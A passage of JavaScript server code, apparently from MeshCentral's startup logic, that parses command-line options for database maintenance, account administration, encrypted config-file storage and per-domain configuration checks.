if (typeof obj.args.agentallowedip == 'string') { if (obj.args.agentallowedip == '') { config.settings.agentallowedip = obj.args.agentallowedip = null; } else { config.settings.agentallowedip = obj.args.agentallowedip = obj.args.agentallowedip.split(','); } }
if (typeof obj.args.agentblockedip == 'string') { if (obj.args.agentblockedip == '') { config.settings.agentblockedip = obj.args.agentblockedip = null; } else { config.settings.agentblockedip = obj.args.agentblockedip = obj.args.agentblockedip.split(','); } }
if (typeof obj.args.swarmallowedip == 'string') { if (obj.args.swarmallowedip == '') { obj.args.swarmallowedip = null; } else { obj.args.swarmallowedip = obj.args.swarmallowedip.split(','); } }
if ((typeof obj.args.agentupdateblocksize == 'number') && (obj.args.agentupdateblocksize >= 1024) && (obj.args.agentupdateblocksize <= 65531)) { obj.agentUpdateBlockSize = obj.args.agentupdateblocksize; }
// Local console tracing
if (typeof obj.args.debug == 'string') { obj.debugSources = obj.args.debug.toLowerCase().split(','); }
else if (typeof obj.args.debug == 'object') { obj.debugSources = obj.args.debug; }
else if (obj.args.debug === true) { obj.debugSources = '*'; }
require('./db.js').CreateDB(obj,
function (db) {
obj.db = db;
obj.db.SetupDatabase(function (dbversion) {
// See if any database operations needs to be completed
if (obj.args.deletedomain) { obj.db.DeleteDomain(obj.args.deletedomain, function () { console.log('Deleted domain ' + obj.args.deletedomain + '.'); process.exit(); }); return; }
if (obj.args.deletedefaultdomain) { obj.db.DeleteDomain('', function () { console.log('Deleted default domain.'); process.exit(); }); return; }
if (obj.args.showall) { obj.db.GetAll(function (err, docs) { console.log(docs); process.exit(); }); return; }
if (obj.args.showusers) { obj.db.GetAllType('user', function (err, docs) { console.log(docs); process.exit(); }); return; }
if (obj.args.listuserids) { obj.db.GetAllType('user', function (err, docs) { for (var i in docs) { console.log(docs[i]._id); } process.exit(); }); return; }
if (obj.args.showusergroups) { obj.db.GetAllType('ugrp', function (err, docs) { console.log(docs); process.exit(); }); return; }
if (obj.args.shownodes) { obj.db.GetAllType('node', function (err, docs) { console.log(docs); process.exit(); }); return; }
if (obj.args.showmeshes) { obj.db.GetAllType('mesh', function (err, docs) { console.log(docs); process.exit(); }); return; }
if (obj.args.showevents) { obj.db.GetAllEvents(function (err, docs) { console.log(docs); process.exit(); }); return; }
if (obj.args.showsmbios) { obj.db.GetAllSMBIOS(function (err, docs) { console.log(docs); process.exit(); }); return; }
if (obj.args.showpower) { obj.db.getAllPower(function (err, docs) { console.log(docs); process.exit(); }); return; }
if (obj.args.clearpower) { obj.db.removeAllPowerEvents(function () { process.exit(); }); return; }
if (obj.args.showiplocations) { obj.db.GetAllType('iploc', function (err, docs) { console.log(docs); process.exit(); }); return; }
if (obj.args.logintoken) { obj.getLoginToken(obj.args.logintoken, function (r) { console.log(r); process.exit(); }); return; }
if (obj.args.logintokenkey) { obj.showLoginTokenKey(function (r) { console.log(r); process.exit(); }); return; }
if (obj.args.recordencryptionrecode) { obj.db.performRecordEncryptionRecode(function (count) { console.log('Re-encoded ' + count + ' record(s).'); process.exit(); }); return; }
if (obj.args.dbstats) { obj.db.getDbStats(function (stats) { console.log(stats); process.exit(); }); return; }
if (obj.args.createaccount) { // Create a new user account
if ((typeof obj.args.createaccount != 'string') || (obj.args.pass == null) || (obj.args.pass == '') || (obj.args.createaccount.indexOf(' ') >= 0)) { console.log("Usage: --createaccount [username] --pass [password] --domain (domain) --email (email)."); process.exit(); return; }
var userid = 'user/' + (obj.args.domain ? obj.args.domain : '') + '/' + obj.args.createaccount.toLowerCase(), domainid = obj.args.domain ? obj.args.domain : '';
obj.db.Get(userid, function (err, docs) {
if (err != null) { console.log("Database error: " + err); process.exit(); return; }
if ((docs != null) && (docs.length != 0)) { console.log('User already exists.'); process.exit(); return; }
if ((domainid != '') && ((config.domains == null) || (config.domains[domainid] == null))) { console.log("Invalid domain."); process.exit(); return; }
var user = { _id: userid, type: 'user', name: obj.args.createaccount, domain: domainid, creation: Math.floor(Date.now() / 1000), links: {} };
if (typeof obj.args.email == 'string') { user.email = obj.args.email; user.emailVerified = true; }
require('./pass').hash(obj.args.pass, function (err, salt, hash, tag) { if (err) { console.log("Unable create account password: " + err); process.exit(); return; } user.salt = salt; user.hash = hash; obj.db.Set(user, function () { console.log("Done."); process.exit(); return; }); }, 0);
});
return;
}
if (obj.args.resetaccount) { // Unlock a user account, set a new password and remove 2FA
if ((typeof obj.args.resetaccount != 'string') || (obj.args.pass == null) || (obj.args.pass == '') || (obj.args.resetaccount.indexOf(' ') >= 0)) { console.log("Usage: --resetaccount [username] --domain (domain) --pass [password]."); process.exit(); return; }
var userid = 'user/' + (obj.args.domain ? obj.args.domain : '') + '/' + obj.args.resetaccount.toLowerCase(), domainid = obj.args.domain ? obj.args.domain : '';
obj.db.Get(userid, function (err, docs) {
if (err != null) { console.log("Database error: " + err); process.exit(); return; }
if ((docs == null) || (docs.length == 0)) { console.log("Unknown username, usage: --resetaccount [username] --domain (domain) --pass [password]."); process.exit(); return; }
var user = docs[0]; if ((user.siteadmin) && (user.siteadmin != 0xFFFFFFFF) && (user.siteadmin & 32) != 0) { user.siteadmin -= 32; } // Unlock the account.
delete user.otpekey; delete user.otpsecret; delete user.otpkeys; delete user.otphkeys; // Disable 2FA
require('./pass').hash(obj.args.pass, user.salt, function (err, hash, tag) { if (err) { console.log("Unable to reset password: " + err); process.exit(); return; } user.hash = hash; obj.db.Set(user, function () { console.log("Done."); process.exit(); return; }); }, 0);
});
return;
}
if (obj.args.adminaccount) { // Set a user account to server administrator
if ((typeof obj.args.adminaccount != 'string') || (obj.args.adminaccount.indexOf(' ') >= 0)) { console.log("Invalid userid, usage: --adminaccount [username] --domain (domain)."); process.exit(); return; }
var userid = 'user/' + (obj.args.domain ? obj.args.domain : '') + '/' + obj.args.adminaccount.toLowerCase(), domainid = obj.args.domain ? obj.args.domain : '';
obj.db.Get(userid, function (err, docs) {
if (err != null) { console.log("Database error: " + err); process.exit(); return; }
if ((docs == null) || (docs.length == 0)) { console.log("Unknown username, usage: --adminaccount [username] --domain (domain)."); process.exit(); return; }
docs[0].siteadmin = 0xFFFFFFFF; // Set user as site administrator
obj.db.Set(docs[0], function () { console.log("Done."); process.exit(); return; });
});
return;
}
// Show a list of all configuration files in the database
if (obj.args.dblistconfigfiles) {
    // For each 'cfile' record, print the file name (portion after the 'cfile/' id prefix) and its base64-decoded size in bytes.
    obj.db.GetAllType('cfile', function (err, docs) { if (err == null) { if (docs.length == 0) { console.log("No files found."); } else { for (var i in docs) { console.log(docs[i]._id.split('/')[1] + ', ' + Buffer.from(docs[i].data, 'base64').length + ' bytes.'); } } } else { console.log('Unable to read from database.'); } process.exit(); }); return;
}
// Display the content of a configuration file in the database
if (obj.args.dbshowconfigfile) {
    // --configkey is required to decrypt the stored file content.
    if (typeof obj.args.configkey != 'string') { console.log("Error, --configkey is required."); process.exit(); return; }
    obj.db.getConfigFile(obj.args.dbshowconfigfile, function (err, docs) {
        if (err == null) {
            if (docs.length == 0) { console.log("File not found."); } else {
                // Decrypt with the provided key; decryptData returns null when the key does not match.
                var data = obj.db.decryptData(obj.args.configkey, docs[0].data);
                if (data == null) { console.log("Invalid config key."); } else { console.log(data); }
            }
        } else { console.log("Unable to read from database."); }
        process.exit();
    }); return;
}
// Delete all configuration files from database
if (obj.args.dbdeleteconfigfiles) {
console.log("Deleting all configuration files from the database..."); obj.db.RemoveAllOfType('cfile', function () { console.log('Done.'); process.exit(); });
}
// Push all relevant files from meshcentral-data into the database
if (obj.args.dbpushconfigfiles) {
    if (typeof obj.args.configkey != 'string') { console.log("Error, --configkey is required."); process.exit(); return; }
    if ((obj.args.dbpushconfigfiles !== true) && (typeof obj.args.dbpushconfigfiles != 'string')) {
        // FIX: the usage text previously referenced the wrong flag (--dbpulldatafiles).
        console.log("Usage: --dbpushconfigfiles (path) This will import files from folder into the database");
        console.log("       --dbpushconfigfiles        This will import files from meshcentral-data into the db.");
        process.exit();
    } else {
        // '*' or a bare flag means push from the meshcentral-data folder.
        if ((obj.args.dbpushconfigfiles == '*') || (obj.args.dbpushconfigfiles === true)) { obj.args.dbpushconfigfiles = obj.datapath; }
        obj.fs.readdir(obj.args.dbpushconfigfiles, function (err, files) {
            if (err != null) { console.log('ERROR: Unable to read from folder ' + obj.args.dbpushconfigfiles); process.exit(); return; }
            // The folder must contain config.json to be considered a valid data folder.
            var configFound = false;
            for (var i in files) { if (files[i] == 'config.json') { configFound = true; } }
            if (configFound == false) { console.log('ERROR: No config.json in folder ' + obj.args.dbpushconfigfiles); process.exit(); return; }
            // Wipe existing config files, then push each eligible file, encrypted with --configkey.
            obj.db.RemoveAllOfType('cfile', function () {
                obj.fs.readdir(obj.args.dbpushconfigfiles, function (err, files) {
                    var lockCount = 1; // Reference count of outstanding setConfigFile() calls (+1 for the loop itself).
                    for (var i in files) {
                        const file = files[i];
                        // Only push configuration-relevant files: config.json, keys/certs, terms, images.
                        if ((file == 'config.json') || file.endsWith('.key') || file.endsWith('.crt') || (file == 'terms.txt') || file.endsWith('.jpg') || file.endsWith('.png')) {
                            const path = obj.path.join(obj.args.dbpushconfigfiles, files[i]), binary = Buffer.from(obj.fs.readFileSync(path, { encoding: 'binary' }), 'binary');
                            console.log('Pushing ' + file + ', ' + binary.length + ' bytes.');
                            lockCount++;
                            obj.db.setConfigFile(file, obj.db.encryptData(obj.args.configkey, binary), function () { if ((--lockCount) == 0) { console.log('Done.'); process.exit(); } });
                        }
                    }
                    if (--lockCount == 0) { process.exit(); }
                });
            });
        });
    }
    return;
}
// Pull all database files into meshcentral-data
if (obj.args.dbpullconfigfiles) {
    if (typeof obj.args.configkey != 'string') { console.log("Error, --configkey is required."); process.exit(); return; }
    if (typeof obj.args.dbpullconfigfiles != 'string') {
        // FIX: the usage text previously referenced the wrong flag (--dbpulldatafiles).
        console.log("Usage: --dbpullconfigfiles (path)");
        process.exit();
    } else {
        obj.db.GetAllType('cfile', function (err, docs) {
            if (err == null) {
                if (docs.length == 0) {
                    console.log("File not found.");
                } else {
                    // Decrypt each stored file with --configkey and write it to the target folder.
                    for (var i in docs) {
                        const file = docs[i]._id.split('/')[1], binary = obj.db.decryptData(obj.args.configkey, docs[i].data);
                        if (binary == null) {
                            console.log("Invalid config key.");
                        } else {
                            var fullFileName = obj.path.join(obj.args.dbpullconfigfiles, file);
                            try { obj.fs.writeFileSync(fullFileName, binary); } catch (ex) { console.log('Unable to write to ' + fullFileName); process.exit(); return; }
                            console.log('Pulling ' + file + ', ' + binary.length + ' bytes.');
                        }
                    }
                }
            } else {
                console.log("Unable to read from database.");
            }
            process.exit();
        });
    }
    return;
}
if (obj.args.dbexport) {
// Export the entire database to a JSON file
if (obj.args.dbexport == true) { obj.args.dbexport = obj.getConfigFilePath('meshcentral.db.json'); }
obj.db.GetAll(function (err, docs) {
obj.fs.writeFileSync(obj.args.dbexport, JSON.stringify(docs));
console.log('Exported ' + docs.length + ' objects(s) to ' + obj.args.dbexport + '.'); process.exit();
});
return;
}
if (obj.args.dbexportmin) {
// Export a minimal database to a JSON file. Export only users, meshes and nodes.
// This is a useful command to look at the database.
if (obj.args.dbexportmin == true) { obj.args.dbexportmin = obj.getConfigFilePath('meshcentral.db.json'); }
obj.db.GetAllType({ $in: ['user', 'node', 'mesh'] }, function (err, docs) {
obj.fs.writeFileSync(obj.args.dbexportmin, JSON.stringify(docs));
console.log('Exported ' + docs.length + ' objects(s) to ' + obj.args.dbexportmin + '.'); process.exit();
});
return;
}
if (obj.args.dbimport) {
// Import the entire database from a JSON file
if (obj.args.dbimport == true) { obj.args.dbimport = obj.getConfigFilePath('meshcentral.db.json'); }
var json = null, json2 = "", badCharCount = 0;
try { json = obj.fs.readFileSync(obj.args.dbimport, { encoding: 'utf8' }); } catch (e) { console.log('Invalid JSON file: ' + obj.args.dbimport + ': ' + e); process.exit(); }
for (i = 0; i < json.length; i++) { if (json.charCodeAt(i) >= 32) { json2 += json[i]; } else { var tt = json.charCodeAt(i); if (tt != 10 && tt != 13) { badCharCount++; } } } // Remove all bad chars
if (badCharCount > 0) { console.log(badCharCount + ' invalid character(s) where removed.'); }
try { json = JSON.parse(json2); } catch (e) { console.log('Invalid JSON format: ' + obj.args.dbimport + ': ' + e); process.exit(); }
if ((json == null) || (typeof json.length != 'number') || (json.length < 1)) { console.log('Invalid JSON format: ' + obj.args.dbimport + '.'); }
for (i in json) { if ((json[i].type == "mesh") && (json[i].links != null)) { for (var j in json[i].links) { var esc = obj.common.escapeFieldName(j); if (esc !== j) { json[i].links[esc] = json[i].links[j]; delete json[i].links[j]; } } } } // Escape MongoDB invalid field chars
//for (i in json) { if ((json[i].type == "node") && (json[i].host != null)) { json[i].rname = json[i].host; delete json[i].host; } } // DEBUG: Change host to rname
setTimeout(function () { // If the Mongo database is being created for the first time, there is a race condition here. This will get around it.
obj.db.RemoveAll(function () {
obj.db.InsertMany(json, function (err) {
if (err != null) { console.log(err); } else { console.log('Imported ' + json.length + ' objects(s) from ' + obj.args.dbimport + '.'); } process.exit();
});
});
}, 100);
return;
}
/*
if (obj.args.dbimport) {
// Import the entire database from a very large JSON file
obj.db.RemoveAll(function () {
if (obj.args.dbimport == true) { obj.args.dbimport = obj.getConfigFilePath('meshcentral.db.json'); }
var json = null, json2 = "", badCharCount = 0;
const StreamArray = require('stream-json/streamers/StreamArray');
const jsonStream = StreamArray.withParser();
jsonStream.on('data', function (data) { obj.db.Set(data.value); });
jsonStream.on('end', () => { console.log('Done.'); process.exit(); });
obj.fs.createReadStream(obj.args.dbimport).pipe(jsonStream.input);
});
return;
}
*/
if (obj.args.dbmerge) {
// Import the entire database from a JSON file
if (obj.args.dbmerge == true) { obj.args.dbmerge = obj.getConfigFilePath('meshcentral.db.json'); }
var json = null, json2 = "", badCharCount = 0;
try { json = obj.fs.readFileSync(obj.args.dbmerge, { encoding: 'utf8' }); } catch (e) { console.log('Invalid JSON file: ' + obj.args.dbmerge + ': ' + e); process.exit(); }
for (i = 0; i < json.length; i++) { if (json.charCodeAt(i) >= 32) { json2 += json[i]; } else { var tt = json.charCodeAt(i); if (tt != 10 && tt != 13) { badCharCount++; } } } // Remove all bad chars
if (badCharCount > 0) { console.log(badCharCount + ' invalid character(s) where removed.'); }
try { json = JSON.parse(json2); } catch (e) { console.log('Invalid JSON format: ' + obj.args.dbmerge + ': ' + e); process.exit(); }
if ((json == null) || (typeof json.length != 'number') || (json.length < 1)) { console.log('Invalid JSON format: ' + obj.args.dbimport + '.'); }
// Get all users from current database
obj.db.GetAllType('user', function (err, docs) {
var users = {}, usersCount = 0;
for (var i in docs) { users[docs[i]._id] = docs[i]; usersCount++; }
// Fetch all meshes from the database
obj.db.GetAllType('mesh', function (err, docs) {
obj.common.unEscapeAllLinksFieldName(docs);
var meshes = {}, meshesCount = 0;
for (var i in docs) { meshes[docs[i]._id] = docs[i]; meshesCount++; }
console.log('Loaded ' + usersCount + ' users and ' + meshesCount + ' meshes.');
// Look at each object in the import file
var objectToAdd = [];
for (var i in json) {
var newobj = json[i];
if (newobj.type == 'user') {
// Check if the user already exists
var existingUser = users[newobj._id];
if (existingUser) {
// Merge the links
if (typeof newobj.links == 'object') {
for (var j in newobj.links) {
if ((existingUser.links == null) || (existingUser.links[j] == null)) {
if (existingUser.links == null) { existingUser.links = {}; }
existingUser.links[j] = newobj.links[j];
}
}
}
if (existingUser.name == 'admin') { existingUser.links = {}; }
objectToAdd.push(existingUser); // Add this user
} else {
objectToAdd.push(newobj); // Add this user
}
} else if (newobj.type == 'mesh') {
// Add this object
objectToAdd.push(newobj);
} // Don't add nodes.
}
console.log('Importing ' + objectToAdd.length + ' object(s)...');
var pendingCalls = 1;
for (var i in objectToAdd) {
pendingCalls++;
obj.db.Set(objectToAdd[i], function (err) { if (err != null) { console.log(err); } else { if (--pendingCalls == 0) { process.exit(); } } });
}
if (--pendingCalls == 0) { process.exit(); }
});
});
return;
}
// Load configuration from database if needed
if (obj.args.loadconfigfromdb) {
    // The decryption key comes from --configkey, or from the value of --loadconfigfromdb itself.
    var key = null;
    if (typeof obj.args.configkey == 'string') { key = obj.args.configkey; }
    else if (typeof obj.args.loadconfigfromdb == 'string') { key = obj.args.loadconfigfromdb; }
    if (key == null) { console.log("Error, --configkey is required."); process.exit(); return; }
    obj.db.getAllConfigFiles(key, function (configFiles) {
        if (configFiles == null) { console.log("Error, no configuration files found or invalid configkey."); process.exit(); return; }
        // FIX: message read "could not file config.json"; corrected to "could not find".
        if (!configFiles['config.json']) { console.log("Error, could not find config.json from database."); process.exit(); return; }
        obj.configurationFiles = configFiles;
        // Parse the new configuration file
        var config2 = null;
        try { config2 = JSON.parse(configFiles['config.json']); } catch (ex) { console.log('Error, unable to parse config.json from database.'); process.exit(); return; }
        // Set the command line arguments to the config file if they are not present
        if (!config2.settings) { config2.settings = {}; }
        for (i in args) { config2.settings[i] = args[i]; }
        // Lower case all keys in the config file
        try {
            require('./common.js').objKeysToLower(config2, ['ldapoptions', 'defaultuserwebstate', 'forceduserwebstate']);
        } catch (ex) {
            console.log("CRITICAL ERROR: Unable to access the file \"./common.js\".\r\nCheck folder & file permissions.");
            process.exit();
            return;
        }
        // Grab some of the values from the original config.json file if present.
        config2['mysql'] = config['mysql'];
        config2['mariadb'] = config['mariadb'];
        config2['mongodb'] = config['mongodb'];
        config2['mongodbcol'] = config['mongodbcol'];
        config2['dbencryptkey'] = config['dbencryptkey'];
        // We got a new config.json from the database, let's use it.
        config = obj.config = config2;
        obj.StartEx1b();
    });
} else {
    // No database configuration requested: read config.json from disk (skipping the file when --vault is used).
    config = obj.config = getConfig(obj.args.vault == null);
    obj.StartEx1b();
}
});
}
);
};
// Time to start the server for real.
obj.StartEx1b = function () {
    // Second startup stage: handle remaining one-shot command line actions (--admin,
    // --getwspass, ...), validate and normalize the domain configuration, then hand
    // off to the redirection server / StartEx2.
    var i;
    // Linux format /var/log/auth.log
    if (obj.config.settings.authlog != null) {
        obj.fs.open(obj.config.settings.authlog, 'a', function (err, fd) {
            if (err == null) { obj.authlogfile = fd; obj.authlog = true; } else { console.log('ERROR: Unable to open: ' + obj.config.settings.authlog); }
        })
    }
    // Check if self update is allowed. If running as a Windows service, self-update is not possible.
    if (obj.fs.existsSync(obj.path.join(__dirname, 'daemon'))) { obj.serverSelfWriteAllowed = false; }
    // If we are targeting a specific version, update now.
    if ((obj.serverSelfWriteAllowed == true) && (typeof obj.args.selfupdate == 'string')) {
        obj.args.selfupdate = obj.args.selfupdate.toLowerCase();
        if (getCurrentVerion() !== obj.args.selfupdate) { obj.performServerUpdate(); return; } // We are targeting a specific version, run self update now.
    }
    // Write the server state
    obj.updateServerState('state', 'starting');
    if (process.pid) { obj.updateServerState('server-pid', process.pid); }
    if (process.ppid) { obj.updateServerState('server-parent-pid', process.ppid); }
    // Start memory tracking if requested
    if (typeof obj.args.memorytracking == 'number') {
        // First append a CSV header row with the memoryUsage field names, then append one value row per interval.
        var info = process.memoryUsage(), txt = [];
        info.time = Date.now();
        for (var i in info) { txt.push(i); }
        obj.fs.appendFile(obj.getConfigFilePath('memorytracking.csv'), txt.join(',') + '\r\n', function (err) { });
        setInterval(function () {
            var info = process.memoryUsage(), txt = [];
            info.time = Date.now();
            for (var i in info) { txt.push(info[i]); }
            obj.fs.appendFile(obj.getConfigFilePath('memorytracking.csv'), txt.join(',') + '\r\n', function (err) { });
        }, (obj.args.memorytracking * 1000));
    }
    // Read environment variables. For a subset of arguments, we allow them to be read from environment variables.
    var xenv = ['user', 'port', 'mpsport', 'mpsaliasport', 'redirport', 'rediraliasport', 'exactport', 'debug'];
    for (i in xenv) { if ((obj.args[xenv[i]] == null) && (process.env['mesh' + xenv[i]])) { obj.args[xenv[i]] = obj.common.toNumber(process.env['mesh' + xenv[i]]); } }
    // Validate the domains, this is used for multi-hosting
    if (obj.config.domains == null) { obj.config.domains = {}; }
    if (obj.config.domains[''] == null) { obj.config.domains[''] = {}; }
    if (obj.config.domains[''].dns != null) { console.log("ERROR: Default domain can't have a DNS name."); return; }
    // Rebuild the domain map with lower-cased domain names.
    var xdomains = {}; for (i in obj.config.domains) { xdomains[i.toLowerCase()] = obj.config.domains[i]; } obj.config.domains = xdomains;
    var bannedDomains = ['public', 'private', 'images', 'scripts', 'styles', 'views']; // List of banned domains
    for (i in obj.config.domains) { for (var j in bannedDomains) { if (i == bannedDomains[j]) { console.log("ERROR: Domain '" + i + "' is not allowed domain name in config.json."); return; } } }
    // Normalize each domain: compute url/id, split comma-separated lists, convert
    // account-rights names to flag bits, and locate per-domain web override folders.
    for (i in obj.config.domains) {
        if (typeof obj.config.domains[i] != 'object') { console.log("ERROR: Invalid domain configuration in config.json."); process.exit(); return; }
        if ((i.length > 0) && (i[0] == '_')) { delete obj.config.domains[i]; continue; } // Remove any domains with names that start with _
        if (typeof config.domains[i].auth == 'string') { config.domains[i].auth = config.domains[i].auth.toLowerCase(); }
        if (obj.config.domains[i].limits == null) { obj.config.domains[i].limits = {}; }
        // Domains reached by path get '/<name>/' as url; DNS-bound domains sit at the root.
        if (obj.config.domains[i].dns == null) { obj.config.domains[i].url = (i == '') ? '/' : ('/' + i + '/'); } else { obj.config.domains[i].url = '/'; }
        obj.config.domains[i].id = i;
        // Normalize loginkey to an array, and each IP allow/block list to an array (or null when empty).
        if (typeof obj.config.domains[i].loginkey == 'string') { obj.config.domains[i].loginkey = [obj.config.domains[i].loginkey]; }
        if (typeof obj.config.domains[i].userallowedip == 'string') { if (obj.config.domains[i].userallowedip == '') { obj.config.domains[i].userallowedip = null; } else { obj.config.domains[i].userallowedip = obj.config.domains[i].userallowedip.split(','); } }
        if (typeof obj.config.domains[i].userblockedip == 'string') { if (obj.config.domains[i].userblockedip == '') { obj.config.domains[i].userblockedip = null; } else { obj.config.domains[i].userblockedip = obj.config.domains[i].userblockedip.split(','); } }
        if (typeof obj.config.domains[i].agentallowedip == 'string') { if (obj.config.domains[i].agentallowedip == '') { obj.config.domains[i].agentallowedip = null; } else { obj.config.domains[i].agentallowedip = obj.config.domains[i].agentallowedip.split(','); } }
        if (typeof obj.config.domains[i].agentblockedip == 'string') { if (obj.config.domains[i].agentblockedip == '') { obj.config.domains[i].agentblockedip = null; } else { obj.config.domains[i].agentblockedip = obj.config.domains[i].agentblockedip.split(','); } }
        if ((obj.config.domains[i].passwordrequirements != null) && (typeof obj.config.domains[i].passwordrequirements == 'object')) {
            // skip2factor must be a comma-separated string; anything else is discarded.
            if (typeof obj.config.domains[i].passwordrequirements.skip2factor == 'string') {
                obj.config.domains[i].passwordrequirements.skip2factor = obj.config.domains[i].passwordrequirements.skip2factor.split(',');
            } else {
                delete obj.config.domains[i].passwordrequirements.skip2factor;
            }
        }
        if ((obj.config.domains[i].auth == 'ldap') && (typeof obj.config.domains[i].ldapoptions != 'object')) {
            if (i == '') { console.log("ERROR: Default domain is LDAP, but is missing LDAPOptions."); } else { console.log("ERROR: Domain '" + i + "' is LDAP, but is missing LDAPOptions."); }
            process.exit();
            return;
        }
        if ((obj.config.domains[i].auth == 'ldap') || (obj.config.domains[i].auth == 'sspi')) { obj.config.domains[i].newaccounts = 0; } // No new accounts allowed in SSPI/LDAP authentication modes.
        // Convert newAccountsRights from a array of strings to flags number.
        if (obj.config.domains[i].newaccountsrights && Array.isArray(obj.config.domains[i].newaccountsrights)) {
            var newAccRights = 0;
            for (var j in obj.config.domains[i].newaccountsrights) {
                var r = obj.config.domains[i].newaccountsrights[j].toLowerCase();
                if (r == 'fulladmin') { newAccRights = 4294967295; } // 0xFFFFFFFF
                if (r == 'serverbackup') { newAccRights |= 1; }
                if (r == 'manageusers') { newAccRights |= 2; }
                if (r == 'serverrestore') { newAccRights |= 4; }
                if (r == 'fileaccess') { newAccRights |= 8; }
                if (r == 'serverupdate') { newAccRights |= 16; }
                if (r == 'locked') { newAccRights |= 32; }
                if (r == 'nonewgroups') { newAccRights |= 64; }
                if (r == 'notools') { newAccRights |= 128; }
            }
            obj.config.domains[i].newaccountsrights = newAccRights;
        }
        if (obj.config.domains[i].newaccountsrights && (typeof (obj.config.domains[i].newaccountsrights) != 'number')) { delete obj.config.domains[i].newaccountsrights; }
        // Check if there is a web views path and/or web public path for this domain
        if ((__dirname.endsWith('/node_modules/meshcentral')) || (__dirname.endsWith('\\node_modules\\meshcentral')) || (__dirname.endsWith('/node_modules/meshcentral/')) || (__dirname.endsWith('\\node_modules\\meshcentral\\'))) {
            // Installed under node_modules: override folders live two levels up.
            if ((obj.config.domains[i].webviewspath == null) && (obj.fs.existsSync(obj.path.join(__dirname, '../../meshcentral-web-' + i + '/views')))) { obj.config.domains[i].webviewspath = obj.path.join(__dirname, '../../meshcentral-web-' + i + '/views'); }
            if ((obj.config.domains[i].webpublicpath == null) && (obj.fs.existsSync(obj.path.join(__dirname, '../../meshcentral-web-' + i + '/public')))) { obj.config.domains[i].webpublicpath = obj.path.join(__dirname, '../../meshcentral-web-' + i + '/public'); }
            if ((obj.config.domains[i].webemailspath == null) && (obj.fs.existsSync(obj.path.join(__dirname, '../../meshcentral-web-' + i + '/emails')))) { obj.config.domains[i].webemailspath = obj.path.join(__dirname, '../../meshcentral-web-' + i + '/emails'); }
        } else {
            if ((obj.config.domains[i].webviewspath == null) && (obj.fs.existsSync(obj.path.join(__dirname, '../meshcentral-web-' + i + '/views')))) { obj.config.domains[i].webviewspath = obj.path.join(__dirname, '../meshcentral-web-' + i + '/views'); }
            if ((obj.config.domains[i].webpublicpath == null) && (obj.fs.existsSync(obj.path.join(__dirname, '../meshcentral-web-' + i + '/public')))) { obj.config.domains[i].webpublicpath = obj.path.join(__dirname, '../meshcentral-web-' + i + '/public'); }
            if ((obj.config.domains[i].webemailspath == null) && (obj.fs.existsSync(obj.path.join(__dirname, '../meshcentral-web-' + i + '/emails')))) { obj.config.domains[i].webemailspath = obj.path.join(__dirname, '../meshcentral-web-' + i + '/emails'); }
        }
    }
    // Log passed arguments into Windows Service Log
    //if (obj.servicelog != null) { var s = ''; for (i in obj.args) { if (i != '_') { if (s.length > 0) { s += ', '; } s += i + "=" + obj.args[i]; } } logInfoEvent('MeshServer started with arguments: ' + s); }
    // Look at passed in arguments
    if ((obj.args.user != null) && (typeof obj.args.user != 'string')) { delete obj.args.user; }
    if ((obj.args.ciralocalfqdn != null) && ((obj.args.lanonly == true) || (obj.args.wanonly == true))) { addServerWarning("CIRA local FQDN's ignored when server in LAN-only or WAN-only mode."); }
    if ((obj.args.ciralocalfqdn != null) && (obj.args.ciralocalfqdn.split(',').length > 4)) { addServerWarning("Can't have more than 4 CIRA local FQDN's. Ignoring value."); obj.args.ciralocalfqdn = null; }
    if (obj.args.ignoreagenthashcheck === true) { addServerWarning("Agent hash checking is being skipped, this is unsafe."); }
    // Default ports: 443 (or 80 with --notls) for the main server, 4433 for Intel AMT MPS, 80 for the HTTP redirect server.
    if (obj.args.port == null || typeof obj.args.port != 'number') { if (obj.args.notls == null) { obj.args.port = 443; } else { obj.args.port = 80; } }
    if (obj.args.aliasport != null && (typeof obj.args.aliasport != 'number')) obj.args.aliasport = null;
    if (obj.args.mpsport == null || typeof obj.args.mpsport != 'number') obj.args.mpsport = 4433;
    if (obj.args.mpsaliasport != null && (typeof obj.args.mpsaliasport != 'number')) obj.args.mpsaliasport = null;
    if (obj.args.rediraliasport != null && (typeof obj.args.rediraliasport != 'number')) obj.args.rediraliasport = null;
    if (obj.args.notls == null && obj.args.redirport == null) obj.args.redirport = 80;
    if (obj.args.minifycore === 0) obj.args.minifycore = false;
    if (typeof args.agentidletimeout != 'number') { args.agentidletimeout = 150000; } else { args.agentidletimeout *= 1000 } // Default agent idle timeout is 2m, 30sec.
    // Setup a site administrator
    if ((obj.args.admin) && (typeof obj.args.admin == 'string')) {
        // Accept 'name' (default domain) or 'domain/name'; build the user/<domain>/<name> id.
        var adminname = obj.args.admin.split('/');
        if (adminname.length == 1) { adminname = 'user//' + adminname[0]; }
        else if (adminname.length == 2) { adminname = 'user/' + adminname[0] + '/' + adminname[1]; }
        else { console.log("Invalid administrator name."); process.exit(); return; }
        obj.db.Get(adminname, function (err, user) {
            if (user.length != 1) { console.log("Invalid user name."); process.exit(); return; }
            user[0].siteadmin = 4294967295; // 0xFFFFFFFF
            obj.db.Set(user[0], function () {
                if (user[0].domain == '') { console.log('User ' + user[0].name + ' set to site administrator.'); } else { console.log("User " + user[0].name + " of domain " + user[0].domain + " set to site administrator."); }
                process.exit();
                return;
            });
        });
        return;
    }
    // Remove a site administrator
    if ((obj.args.unadmin) && (typeof obj.args.unadmin == 'string')) {
        // Same 'name' or 'domain/name' form as --admin above.
        var adminname = obj.args.unadmin.split('/');
        if (adminname.length == 1) { adminname = 'user//' + adminname[0]; }
        else if (adminname.length == 2) { adminname = 'user/' + adminname[0] + '/' + adminname[1]; }
        else { console.log("Invalid administrator name."); process.exit(); return; }
        obj.db.Get(adminname, function (err, user) {
            if (user.length != 1) { console.log("Invalid user name."); process.exit(); return; }
            if (user[0].siteadmin) { delete user[0].siteadmin; }
            obj.db.Set(user[0], function () {
                if (user[0].domain == '') { console.log("User " + user[0].name + " is not a site administrator."); } else { console.log("User " + user[0].name + " of domain " + user[0].domain + " is not a site administrator."); }
                process.exit();
                return;
            });
        });
        return;
    }
    // Perform other database cleanup
    obj.db.cleanup();
    // Set all nodes to power state of unknown (0)
    obj.db.storePowerEvent({ time: new Date(), nodeid: '*', power: 0, s: 1 }, obj.multiServer); // s:1 indicates that the server is starting up.
    // Read or setup database configuration values
    obj.db.Get('dbconfig', function (err, dbconfig) {
        if (dbconfig.length == 1) { obj.dbconfig = dbconfig[0]; } else { obj.dbconfig = { _id: 'dbconfig', version: 1 }; }
